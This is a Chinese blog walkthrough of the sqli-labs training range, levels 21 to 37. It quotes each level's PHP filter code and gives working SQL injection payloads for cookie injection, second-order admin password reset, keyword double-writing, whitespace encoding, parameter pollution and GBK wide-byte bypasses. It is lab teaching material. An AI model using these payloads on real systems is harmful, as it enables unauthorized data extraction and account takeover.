【Web安全靶场】sqli-labs-master 21-37 Advanced-Injection

sqli-labs-master 21-37 Advanced-Injection

第一关到第二十关请见专栏

文章目录

  • sqli-labs-master 21-37 Advanced-Injection
    • 第二十一关-Cookie注入
    • 第二十二关-Cookie注入
    • 第二十三关-注释符过滤的报错注入
    • 第二十四关-二次注入
    • 第二十五关-过滤OR、AND双写绕过
    • 第二十五a关-过滤OR、AND逻辑符号代替
    • 第二十六关-过滤一堆乱七八糟报错注入
    • 第二十六a关-过滤一堆乱七八糟盲注
    • 第二十七关-select、union过滤报错注入
    • 第二十七a关-select、union过滤盲注与联合注入
    • 第二十八关-select union过滤
    • 第二十八a关-select union过滤
    • 第二十九关-数字白名单WAF
    • 第三十关-数字白名单WAF
    • 第三十一关-数字白名单WAF
    • 第三十二关-宽字节注入
    • 第三十三关-宽字节注入
    • 第三十四关-Post宽字节注入
    • 第三十五关-引号绕过
    • 第三十六关-宽字节注入
    • 第三十七关-mysql_real_escape_string
  • 总结

第二十一关-Cookie注入

这一道题还是cookie注入,但是在抓包看到cookie的值时却不是原来的dhakkan,经过译码后发现它经过了base64编码,所以构造payload:

') or updatexml(1,concat(0x7e,database()),3) or ('
Jykgb3IgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsZGF0YWJhc2UoKSksMykgb3IgKCc=

在这里插入图片描述

在这里插入图片描述

第二十二关-Cookie注入

这一关和第二十一关一样,只是闭合方式不同而已,首先构造base64编码

" or updatexml(1,concat(0x7e,database()),3) or "
IiBvciB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSxkYXRhYmFzZSgpKSwzKSBvciAi

在这里插入图片描述

在这里插入图片描述

第二十三关-注释符过滤的报错注入

首先这是get型,先确定闭合方式为单引号闭合

?id=1'
?id=1' and '1'='2

由第二段可知,网站没有对单引号进行过滤,在进行注释–+和#时候发现没有起到作用,查看源代码发现对注释符号进行了过滤:

$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);

所以我们使用两个and或者or构造闭合试一下,成功:

?id=1' and updatexml(1,concat(0x7e,database()),3) and '

在这里插入图片描述

第二十四关-二次注入

不懂可以点这个博文,有图好讲一点

  • 代码一:实现了简单的用户注册功能,程序获取到GET参数username和参数password,然后将username和password拼接到SQL语句,使用insert语句插入数据库中。由于参数username使用addslashes进行转义(转义了单引号,导致单引号无法闭合),参数password进行了MD5哈希,所以此处不存在SQL注入漏洞。正常插入test’之后,数据库就有了test’这个用户。

  • 当访问username=test’&password=123456时,执行的SQL语句为:

    insert into users(\`username\`,\`password\`)values ('test\'','e10adc3949ba59abbe56e057f20f883e')。
    
<?php
$con=mysqli_connect("localhost", "root", "root", "sql");if (mysqli_connect_errno()) {echo "数据库连接错误: " . mysqli_connect_error();
}
$username = $_GET['username'];
$password = $_GET['password'];
$result = mysqli_query($con, "insert into users(`username`, `password`) values ('".addslashes($username)."','".md5($password)."')");
echo "新 id 为: " . mysqli_insert_id($con);
?>
  • 代码二:在二次注入中,第二段中的代码如下所示,首先将GET参数ID转成int类型(防止拼接到SQL语句时,存在SQL注入漏洞),然后到users表中获取ID对应的username,接着到person表中查询username对应的数据。但是此处没有对$username进行转义,在第一步中我们注册的用户名是test’,此时执行的SQL语句为:

    select * from person where `username`='test''
    

    单引号被带入SQL语句中,由于多了一个单引号,所以页面会报错。

回到24题发现有很多代码。

  • 分析login.php代码发现对于username和password使用了mysql_real_escape_string函数,这个函数会对单引号(')、双引号(")、反斜杠(\)、NULL 字符等加添反斜杠来进行转义,所以在登录界面框无法直接下手。
$username = mysql_real_escape_string($_POST["login_user"]);
$password = mysql_real_escape_string($_POST["login_password"]);
  • 接着分析创建新用户的代码,在new_user.php中有form表单提交到login_create.php中,所以重点还是login_create.php,发现还是存在转义:
$username=  mysql_escape_string($_POST['username']) ;
$pass= mysql_escape_string($_POST['password']);
$re_pass= mysql_escape_string($_POST['re_password']);$sql = "insert into users ( username, password) values(\"$username\", \"$pass\")";
  • 那就登录进去看一下,登录进去是一个修改密码的框,其中不需要填写账号密码,看一下代码:
$username= $_SESSION["username"];
$curr_pass= mysql_real_escape_string($_POST['current_password']);
$pass= mysql_real_escape_string($_POST['password']);
$re_pass= mysql_real_escape_string($_POST['re_password']);$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";

可以发现漏洞存在于此处,这一道题不是获取数据库而是获取admin的密码,所以我们可以构造一个admin’#的账号,虽然在注册部分单引号会被转义但数据库中并不会存在这个反斜杠,注册账号admin’#密码随便,于是就可以登录进去,然后再修改密码,其中的sql语句为:

$sql = "UPDATE users SET PASSWORD='你想要的密码' where username='admin'#' and password='$curr_pass' ";

于是修改admin账号不需要原始密码。

第二十五关-过滤OR、AND双写绕过

分析第二十五关的代码可以发现or和and被过滤了:

$id= preg_replace('/or/i',"", $id);			//strip out OR (non case sensitive)
$id= preg_replace('/AND/i',"", $id);		//Strip out AND (non case sensitive)

但是只进行了一次替代,所以可以进行双写绕过:

?id=1' anandd sleep(10) --+
?id=1' anandd updatexml(1,concat(0x7e,database()),3) --+

在这里插入图片描述

第二十五a关-过滤OR、AND逻辑符号代替

这一道题对or和and进行了过滤,双写有效,但是这是数字型注入,试一下&&和||

?id=1\ 数字型
?id=-1 || sleep(3) 检测&&效果
?id=-1 || updatexml(1,0x7e,3) 无效,所以使用盲注
?id=-1 || if(database()='security',1,0)
?id=-1 || if(database()='security',1,0) 探针有效

在这里插入图片描述

在这里插入图片描述

但是我不知道为什么&&不行…

第二十六关-过滤一堆乱七八糟报错注入

第二十六关绕过的东西很多…

function blacklist($id)
{$id= preg_replace('/or/i',"", $id);			//strip out OR (non case sensitive)$id= preg_replace('/and/i',"", $id);		//Strip out AND (non case sensitive)$id= preg_replace('/[\/\*]/',"", $id);		//strip out /*$id= preg_replace('/[--]/',"", $id);		//Strip out --$id= preg_replace('/[#]/',"", $id);			//Strip out #$id= preg_replace('/[\s]/',"", $id);		//Strip out spaces$id= preg_replace('/[\/\\\\]/',"", $id);		//Strip out slashesreturn $id;
}

先判断闭合吧:

?id=1' 字符型注入

在这里插入图片描述

对于空格过滤使用(),注意点window的phpstudy有时不可以使用%0a这样的编码,而且information里面也有or

?id=1' || updatexml(1, concat(0x7e, (SELECT (group_concat(table_name)) FROM (infoorrmation_schema.tables) WHERE (table_schema=database()))) ,1) || '1'='1 括号绕过
?id=1'%0b||updatexml(1, concat(0x7e, (SELECT%0bgroup_concat(table_name)%0bFROM (infoorrmation_schema.tables) WHERE%0btable_schema=database())) ,1) || '1'='1 编码绕过,不知道为啥只可以使用%0b

在这里插入图片描述

在这里插入图片描述

/**/() 例如:?id=1' || updatexml(1, concat(0x7e, (SELECT (group_concat(table_name)) FROM (infoorrmation_schema.tables) WHERE (table_schema=database()))) ,1) || '1'='1//下面编码貌似在windows phpstudy环境下无效
%09 TAB 键(水平)
%0a 新建一行
%0c 新的一页
%0d return 功能
%0b TAB 键(垂直)
%a0 空`(tap键上面的按钮)+ 加号

第二十六a关-过滤一堆乱七八糟盲注

分析过滤的东西:

$id= preg_replace('/or/i',"", $id);			//strip out OR (non case sensitive)
$id= preg_replace('/and/i',"", $id);		//Strip out AND (non case sensitive)
$id= preg_replace('/[\/\*]/',"", $id);		//strip out /*
$id= preg_replace('/[--]/',"", $id);		//Strip out --
$id= preg_replace('/[#]/',"", $id);			//Strip out #
$id= preg_replace('/[\s]/',"", $id);		//Strip out spaces
$id= preg_replace('/[\s]/',"", $id);		//Strip out spaces
$id= preg_replace('/[\/\\\\]/',"", $id);		//Strip out slashes

在尝试上面第二十六关的报错注入时没有显示报错信息,并且查看代码发现**print_r(mysql_error());**部分被注释掉,所以不可以使用报错注入,尝试一下盲注:

?id=2'anandd'1'='1

通过上面语句回显1的信息可以判断这是单引号加上括号闭合。

?id=1')aandnd(length(database())=8)anandd('1

通过上述语句可以判定存在布尔盲注。

?id=1')aandnd(substr(database(),1,1)='s')anandd('1

第二十七关-select、union过滤报错注入

$id = preg_replace('/[\/\*]/', "", $id);		//strip out /*
$id = preg_replace('/[--]/', "", $id);		//Strip out --.
$id = preg_replace('/[#]/', "", $id);			//Strip out #.
$id = preg_replace('/[ +]/', "", $id);	    //Strip out spaces.
$id = preg_replace('/select/m', "", $id);	    //Strip out spaces.
$id = preg_replace('/[ +]/', "", $id);	    //Strip out spaces.
$id = preg_replace('/union/s', "", $id);	    //Strip out union
$id = preg_replace('/select/s', "", $id);	    //Strip out select
$id = preg_replace('/UNION/s', "", $id);	    //Strip out UNION
$id = preg_replace('/SELECT/s', "", $id);	    //Strip out SELECT
$id = preg_replace('/Union/s', "", $id);	    //Strip out Union
$id = preg_replace('/Select/s', "", $id);	    //Strip out select

这一关对select和union进行了处理,但是存在print_r(mysql_error());,所以可以使用报错注入:

?id=1'%0band%0bupdatexml(1,0x7e,3)%0band%0b'1'='1

在这里插入图片描述

第二十七a关-select、union过滤盲注与联合注入

这一关在第二十七关的基础上对**print_r(mysql_error());**进行了注释,所以我们使用盲注:

?id=1%0band%0b1=2 说明属于字符型?id=1'%0band%0b'1'='2 回显1
?id=2'%0band%0b'1'='1 回显2
说明不是单引号 不是单引号加上括号?id=1"%0band%0b"1"="2 不回显,得到双引号闭合

查看代码,确实是双引号

$id = '"' .$id. '"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

进行布尔盲注:

?id=1"%0band%0blength(database())=8%0band"1"="1
?id=1"%0band%0blength(database())=7%0band"1"="1

通过以上语句说明盲注存在,接下来试一下union注入。采取大小写过滤方式:

?id=0"%0bunioN%0bSeleCT%0b1,database(),3%0bor"1"="1

在这里插入图片描述

第二十八关-select union过滤

$id= preg_replace('/[\/\*]/',"", $id);				//strip out /*
$id= preg_replace('/[--]/',"", $id);				//Strip out --.
$id= preg_replace('/[#]/',"", $id);					//Strip out #.
$id= preg_replace('/[ +]/',"", $id);	    		//Strip out spaces.
//$id= preg_replace('/select/m',"", $id);	   		 	//Strip out spaces.
$id= preg_replace('/[ +]/',"", $id);	    		//Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id);	    //Strip out UNION & SELECT.

同样这里也注释了print_r(mysql_error());

?id=2' and '1'='1

回显1的信息,可以得知这是单引号加上括号闭合,尝试一下拼凑

?id=999')%0bunion%0bseunion%0bselectlect%0b1,database(),3%0bor%0b('1'='1

双写绕过成功。

第二十八a关-select union过滤

?id=2'%0band%0b'1'='1

通过上述语句得到单引号加括号闭合,这一道题只对union和select进行过滤,以及没有报错信息,所以我们尝试盲注:

?id=1'%0band%0blength(database())=8%0band%0b'1'='1

通过改变长度查看回显,可知盲注有用,接着还是像28关一样通过拼凑进行注入union%0bseunion%0bselectlect

第二十九关-数字白名单WAF

先分析这个WAF:

$qs = $_SERVER['QUERY_STRING'];
$hint=$qs;
$id1=java_implimentation($qs);
$id=$_GET['id'];
//echo $id1;
whitelist($id1);//WAF implimentation with a whitelist approach..... only allows input to be Numeric.
function whitelist($input)
{$match = preg_match("/^\d+$/", $input);if($match){//echo "you are good";//return $match;}else{	header('Location: hacked.php');//echo "you are bad";}
}
// The function below immitates the behavior of parameters when subject to HPP (HTTP Parameter Pollution).
function java_implimentation($query_string)
{$q_s = $query_string;$qs_array= explode("&",$q_s);foreach($qs_array as $key => $value){$val=substr($value,0,2);if($val=="id"){$id_value=substr($value,3,30); return $id_value;echo "<br>";break;}}
}

首先如果我们输入id=1时候它会正常显示,因为第二个函数截取了id的值然后传递给第一个函数,由于这是数字所以正常显示;如果输入的是id=a,经过第二个函数截取之后传递给第一个函数由于只能是数字所以会重定向至hacked.php;如果我们输入两个id值,即id=1&id=2,在第二个id处构造payload:

?id=0&id=1' and updatexml(1,concat(0x7e,database()),3) and '

在这里插入图片描述

第三十关-数字白名单WAF

function whitelist($input)
{$match = preg_match("/^\d+$/", $input);if($match){//echo "you are good";//return $match;}else{	header('Location: hacked.php');//echo "you are bad";}
}
// The function below immitates the behavior of parameters when subject to HPP (HTTP Parameter Pollution).
function java_implimentation($query_string)
{$q_s = $query_string;$qs_array= explode("&",$q_s);foreach($qs_array as $key => $value){$val=substr($value,0,2);if($val=="id"){$id_value=substr($value,3,30); return $id_value;echo "<br>";break;}}
}

这一道题的WAF和上一道一样,首先判断闭合方式:

?id=1&id=1"

根据报错信息可以知道这是双引号闭合,而且存在报错注入:

?id=1&id=1" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),3) and "

在这里插入图片描述

第三十一关-数字白名单WAF

//WAF implimentation with a whitelist approach..... only allows input to be Numeric.
function whitelist($input)
{$match = preg_match("/^\d+$/", $input);if($match){//echo "you are good";//return $match;}else{	header('Location: hacked.php');//echo "you are bad";}
}
// The function below immitates the behavior of parameters when subject to HPP (HTTP Parameter Pollution).
function java_implimentation($query_string)
{$q_s = $query_string;$qs_array= explode("&",$q_s);foreach($qs_array as $key => $value){$val=substr($value,0,2);if($val=="id"){$id_value=substr($value,3,30); return $id_value;echo "<br>";break;}}
}

WAF还是一样,判断闭合方式:

?id=1&id=1"

根据报错信息知道是双引号加括号闭合,并且可能存在报错注入:

?id=1&id=1") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),3) and ("

在这里插入图片描述

第三十二关-宽字节注入

function check_addslashes($string)
{$string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string);          //escape any backslash$string = preg_replace('/\'/i', '\\\'', $string);                               //escape single quote with a backslash$string = preg_replace('/\"/', "\\\"", $string);                                //escape double quote with a backslashreturn $string;
}
function strToHex($string)
{$hex='';for ($i=0; $i < strlen($string); $i++){$hex .= dechex(ord($string[$i]));}return $hex;
}
echo "Hint: The Query String you input is escaped as : ".$id ."<br>";
echo "The Query String you input in Hex becomes : ".strToHex($id). "<br>";

对于第一段代码,单引号、双引号和反斜杠都加上了一个反斜杠,我们试一下输入中文:

在这里插入图片描述
输入中文发现回显的是中文为gbk编码,所以我们可以使用宽字节注入,原理就是%df和反斜杠可以组成一个中文字符

?id=1%df' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),3) -- #

在这里插入图片描述

第三十三关-宽字节注入

function check_addslashes($string)
{$string= addslashes($string);    return $string;
}

addslashes()函数会在单引号、双引号、反斜杠和NULL字符前添加反斜杠,对于反斜杠的题目我们试一下中文,中文正常显示所以编码为gbk编码,尝试双字节注入(和上一题一样):

?id=1%df' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),3) -- #

在这里插入图片描述

同样我们也可以通过char函数:

?id=1%df' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=CHAR(115, 101, 99, 117, 114, 105, 116, 121))),3) -- #

在这里插入图片描述

同样也可以通过转化成URL编码:

?id=1%df' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479)),3) -- #

在这里插入图片描述

第三十四关-Post宽字节注入

这是一道Post的注入,在账号处添加单引号回显发现添加了反斜杠,通过查看源代码发现:

$uname = addslashes($uname1);
$passwd= addslashes($passwd1);

输入中文发现可以回显中文,查看源代码也是使用了gbk编码,所以使用宽字节注入:

uname=1&passwd=1%df' and updatexml(1,concat(0x7e,database()),3) #&Submit=Submit

第三十五关-引号绕过

?id=2-1

通过上述语句可以初步判断这是数字型注入,同样利用引号绕过,但是引号仅在限定条件下使用,我们可以换成十六进制、char等,注意的是不要使用宽字节,因为会将中文带入sql语句中。

?id=2 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273 and table_schema=database())),3)

在这里插入图片描述

?id=2 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=CHAR(117,115,101,114,115) and table_schema=database())),3)

在这里插入图片描述

第三十六关-宽字节注入

?id=1%df'

并尝试输入引号和反斜杠会发现又添加了个反斜杠,输入中文发现有中文回显,使用%df与引号,回显报错信息,得出是单引号闭合,尝试宽字节+报错注入

?id=1%df' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=CHAR(117,115,101,114,115))),3) --+

在这里插入图片描述

第三十七关-mysql_real_escape_string

$uname = mysql_real_escape_string($uname1);
$passwd= mysql_real_escape_string($passwd1);

这一关使用mysql_real_escape_string(),编码的字符是 NUL(ASCII 0)、\n、\r、\、'、" 和 Control-Z。输入中文,回显中文,所以我们尝试一下宽字节注入:

uname=1&passwd=1%df' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),3) #&Submit=Submit

注:第三十四和三十七关我使用harkbar不行,用bp就可以

在这里插入图片描述

总结

  • and和or黑名单,能使用||就使用||
  • 二次注入中那个反斜杠不会到数据库中
  • ?id=2’ and ‘1’='1可以用来判断有没有括号,回显1就有,回显2的信息就没有

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/498415.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Redis为什么这么快?

首先我们需要知道影响Redis性能的因素有哪些&#xff1f; 官网原话说到&#xff0c;影响Redis性能的主要瓶颈并不是CPU而是内存和网络IO&#xff0c;而内存是可以从硬件角度优化的&#xff0c;所以优化的关键就是在网络IO 在Redis6/7中&#xff0c;非常受关注的一个新特性就是多…

【探索AI】十一 深度学习之第1周:深度学习概述与基础

深度学习概述与基础 深度学习的发展历史与现状神经网络的基本原理前向传播与反向传播算法常见的激活函数与优化算法深度学习框架&#xff08;如TensorFlow或PyTorch&#xff09;进行基础操作 深度学习的发展历史与现状 深度学习的发展历史可以追溯到上世纪40年代&#xff0c;当…

云时代【4】—— 资源隔离与控制技术

云时代【4】—— 资源隔离与控制技术 二、资源隔离与控制技术&#xff08;一&#xff09;NameSpace1. 基本介绍2. 相关 Linux 指令实战1&#xff1a;隔离进程实战2&#xff1a;隔离文件系统 &#xff08;二&#xff09;CGroups1. 基本介绍2. 相关 Linux 指令实战1&#xff1a;c…

xilinix 的硬件资源分布

从官方手册UG475中可以看出&#xff0c;下图中的V690T系列的i芯片&#xff0c;其具有的bank数量&#xff0c;已经上下半区的bufg对应的bank关系&#xff0c;实际在开发过程中&#xff0c;可能面临局部资源集中度过高&#xff0c;导致bufg的数量不够的情况&#xff0c;bufg的位置…

(转载)SpringCloud 微服务(三)-Seata解决分布式事务问题

ps:这个原文写的很好&#xff0c;怕后续这个地址失效&#xff0c;备份一个留着自己学习 转自&#xff1a;SpringCloud 微服务&#xff08;三&#xff09;-Seata解决分布式事务问题_seata 黑马 代码-CSDN博客 看完了黑马程序员的免费课程&#xff0c;感觉受益匪浅&#xff0c;…

为什么香港成为黄金交易的热门地?

香港作为一个国际金融中心&#xff0c;吸引了大量的黄金交易活动。这里汇聚了众多财富和机会&#xff0c;引发了人们对黄金交易和实体黄金的兴趣。那么&#xff0c;为什么那么多人爱去香港买黄金&#xff1f;让我们一起来探索黄金交易的魅力。 首先&#xff0c;香港以其优越的地…

2.2_1 调度的概念、层次

文章目录 2.2_1 调度的概念、层次&#xff08;一&#xff09;调度的基本概念&#xff08;二&#xff09;调度的三个层次——高级调度&#xff08;作业调度&#xff09;&#xff08;三&#xff09;调度的三个层次——低级调度&#xff08;进程调度/处理机调度&#xff09;&#…

就业班 2401--2.28 Linux Day7--存储管理1

一 .存储管理 主要知识点: 基本分区、逻辑卷LVM、EXT3/4/XFS文件系统、RAID 初识硬盘 机械 HDD 固态 SSD SSD的优势 SSD采用电子存储介质进行数据存储和读取的一种技术&#xff0c;拥有极高的存储性能&#xff0c;被认为是存储技术发展的未来新星。 与传统硬盘相比&#…

映客星耀夜见证荣耀时刻,我与五个女博士的‘时光宝盒

身为一个长期关注健康和美丽的我&#xff0c;当看到“五个女博士”作为特约合作伙伴亮相2023映客直播年度盛典时&#xff0c;内心充满了喜悦和期待。这不仅是因为我对五个女博士品牌的深厚感情&#xff0c;更是因为我看到了品牌对健康与美丽的坚持和追求。 盛典当晚&#xff0c…

【C语言】while循环语句

&#x1f388;个人主页&#xff1a;豌豆射手^ &#x1f389;欢迎 &#x1f44d;点赞✍评论⭐收藏 &#x1f917;收录专栏&#xff1a;C语言 &#x1f91d;希望本文对您有所裨益&#xff0c;如有不足之处&#xff0c;欢迎在评论区提出指正&#xff0c;让我们共同学习、交流进步&…

品味Fendi Club啤酒与韩式烤肉的异域风情

当Fendi Club啤酒遇上韩式烤肉&#xff0c;仿佛打开了一扇通往异域风味的大门。让我们一起领略这一与众不同的味觉之旅。 Fendi Club啤酒&#xff0c;以其醇厚的口感和淡淡的麦芽香气而著称。这款啤酒在酿造过程中采用了特别的工艺&#xff0c;使得酒体呈现出诱人的金黄色&…

压力测试工具Jmeter的下载与使用

1、进入官网下载Jmeter https://jmeter.apache.org/ 国内镜像&#xff08;下载的慢的话可以用国内镜像下载&#xff09; https://mirrors.cloud.tencent.com/apache/jmeter/binaries/ 2、跳转到下载页面 3、根据不同系统下载相应版本的Jmeter压缩包&#xff0c;Linux系统下载…